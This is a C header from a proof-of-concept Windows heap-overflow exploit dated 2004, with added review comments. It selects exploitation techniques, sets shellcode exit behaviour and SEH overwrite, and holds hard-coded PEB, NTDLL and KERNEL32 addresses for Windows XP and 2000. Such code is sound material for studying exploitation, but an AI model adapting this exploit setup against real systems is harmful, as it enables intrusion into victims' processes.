// Proof-of-concept heap exploit code
// Written by Matt Conover in December 2004
#ifndef SHELLCODE_H
#define SHELLCODE_H

// ---- Exploitation technique --------------------------------------------------
// Exactly one USE_* technique flag is enabled here; the others are kept
// commented out as alternatives.  This header does not show whether the .c
// tolerates more than one being defined at once, so switch them one at a time.
#define USE_LOOKASIDE 1
//#define USE_FREELIST 1
//#define USE_SEGMENT_OVERWRITE 1
//#define USE_CACHE_OVERWRITE 1
//#define USE_DISPATCH_OVERWRITE 1

// ---- Payload behaviour -------------------------------------------------------
// USE_C_SHELLCODE: use c_shellcode_stub() rather than shellcode_stub() (both
// are declared at the bottom of this header).
//#define USE_C_SHELLCODE 1
// How the shellcode finishes.  Presumably USE_THREAD_TERMINATE calls the
// ZW_TERMINATE_THREAD target and USE_PROCESS_TERMINATE the
// ZW_TERMINATE_PROCESS target defined below (verify in the .c); with neither
// defined, the shellcode loops forever instead of exiting.
//#define USE_THREAD_TERMINATE 1 // if this is not defined, the shellcode goes into a loop instead
#define USE_PROCESS_TERMINATE 1
// Also overwrite the exception handler pointer (the SEH address defined below).
// On XP SP2 that pointer is stored encoded -- see the note next to the SP2 SEH value.
#define USE_SEH_HANDLER 1 // overwrites the exception handler

// Absolute addresses of fields in the process environment block (PEB).  All
// of them lie in the same page (0x7ffdf000), i.e. the PEB is assumed to sit at
// a fixed base.  That holds only on pre-ASLR Windows (the XP / 2000 targets
// below) and only for a process whose PEB actually landed in that page.
// NOTE(review): if the PEB base differs, every field address here is wrong --
// confirm with a debugger on the target before relying on them.
#define PEB_CRITICAL_SECTION 0x7ffdf01c
#define PEB_LOCK_ROUTINE 0x7ffdf020
#define PEB_UNLOCK_ROUTINE 0x7ffdf024
#define PEB_SPACE        0x7ffdf154   // presumably spare PEB bytes used as scratch space; verify in the .c
#define PEB_HEAP_COUNT   0x7ffdf088
#define PEB_DEFAULT_HEAP 0x7ffdf018
#define PEB_HEAP_HANDLES 0x7ffdf090
// Pseudo-handle values for the calling thread (-2) and process (-1), as
// returned by GetCurrentThread() / GetCurrentProcess() on 32-bit Windows.
// Presumably hard-coded so the shellcode does not have to import either API.
// The constants are 32-bit; they are not valid for a 64-bit target.
#define GET_CURRENT_THREAD() ((HANDLE)0xFFFFFFFE)
#define GET_CURRENT_PROCESS() ((HANDLE)0xFFFFFFFF)

/////////////////////////////////////////////////////////////////
// Depends on the exact version of NTDLL.DLL and KERNEL32.DLL on the target.
//
// NOTE: YOU MUST CHANGE THE FOLLOWING HARDCODED ADDRESSES TO WHATEVER THEY ARE ON YOUR SYSTEM
// (resolve them on the target build -- e.g. with a debugger or from the DLLs'
// export tables -- before building; this header provides no runtime lookup or
// fallback, so a stale address is not detected, it simply misfires).

// Exactly one of the three address sets below is active (Windows XP SP1); the
// other two are kept commented out for reference.  Each value is an absolute
// virtual address inside that OS build's NTDLL.DLL / KERNEL32.DLL:
//   RTL_ENTER/LEAVE_CRITICAL_SECTION -- RtlEnterCriticalSection / RtlLeaveCriticalSection
//   ZW_TERMINATE_THREAD/PROCESS      -- ZwTerminateThread / ZwTerminateProcess
//   SLEEP                            -- Sleep
//   SEH                              -- the exception-handler pointer that
//                                       USE_SEH_HANDLER overwrites
// These are the targets the shellcode calls or overwrites, so a value taken
// from the wrong build will almost certainly crash the target process rather
// than run the payload.
// Windows XP SP2
//#define RTL_ENTER_CRITICAL_SECTION 0x7C901005
//#define RTL_LEAVE_CRITICAL_SECTION 0x7C9010ED
//#define ZW_TERMINATE_THREAD 0x7C90E8A3
//#define ZW_TERMINATE_PROCESS 0x7C90E88E
//#define SLEEP 0x7C802442
//#define SEH 0x7C8833AC // NOTE on XPSP2: this must be overwritten with a pointer returned from RtlEncodePointer()
// (SP2 keeps this handler pointer encoded, so writing a raw code address there
// will not work; the value written must have gone through RtlEncodePointer()
// inside the target process, since the encoding is per-process.)

// Windows XP SP1  (ACTIVE)
#define RTL_ENTER_CRITICAL_SECTION 0x77f5b2a0 
#define RTL_LEAVE_CRITICAL_SECTION 0x77f5b380
#define ZW_TERMINATE_THREAD 0x77f5c458
#define ZW_TERMINATE_PROCESS 0x77f5c448
#define SLEEP 0x77e61bea
#define SEH 0x77ee044c

// Windows 2000 SP3
//#define RTL_ENTER_CRITICAL_SECTION 0x77f8313c
//#define RTL_LEAVE_CRITICAL_SECTION 0x77f8316d
//#define ZW_TERMINATE_THREAD 0x77f852cd
//#define ZW_TERMINATE_PROCESS 0x77f896c3
//#define SLEEP 0x77ea9d54
//#define SEH 0x77ea1678

// Opcode of the x86 near relative jump with a 32-bit displacement
// (`jmp rel32`, 5 bytes total).  Presumably used by GetFunctionAddress() to
// follow a linker jump thunk to the real function body -- verify in the .c.
#define X86_JMP_4BYTES 0xe9
// Upper bound on a stub's length; presumably bounds the marker scan in
// GetStubLength() -- verify in the .c.
#define MAX_STUB_SIZE 1024
// Three-byte end-of-stub marker (AB CD EF) emitted by END_FUNCTION.
// NOTE(review): if GetStubLength() scans forward for this sequence, any
// instruction whose encoding happens to contain the bytes AB CD EF (e.g. an
// immediate operand) truncates the stub at that point -- keep the sequence out
// of the shellcode's own bytes.
#define END_SIGNATURE_PART1 0xab
#define END_SIGNATURE_PART2 0xcd
#define END_SIGNATURE_PART3 0xef

// Emit the end-of-stub marker as raw bytes into the code stream (MSVC inline
// asm; `_emit` writes one literal byte).  Presumably placed after the last
// instruction of each *_stub body so GetStubLength() can find the end.
#define END_FUNCTION \
	_asm _emit END_SIGNATURE_PART1 \
	_asm _emit END_SIGNATURE_PART2 \
	_asm _emit END_SIGNATURE_PART3

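// Resolve the address of Function's real code.  Presumably follows an E9
// (`jmp rel32`, see X86_JMP_4BYTES) thunk of the kind MSVC incremental
// linking produces, so the returned pointer is the body to copy rather than
// the thunk -- confirm in the .c.
BYTE *GetFunctionAddress(BYTE *Function);

// Length in bytes of the stub beginning at Stub, presumably found by scanning
// forward (bounded by MAX_STUB_SIZE) for the END_SIGNATURE_PART1..3 marker
// that END_FUNCTION emits -- confirm in the .c.
DWORD GetStubLength(BYTE *Stub);

// The two payload stubs; USE_C_SHELLCODE selects which one is used.  Neither
// takes arguments, and `(void)` makes that an enforced prototype -- a bare
// `()` in C declares an unspecified argument list and switches off the
// compiler's argument checking at call sites.
void c_shellcode_stub(void);
void shellcode_stub(void);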
 
#endif // SHELLCODE_H
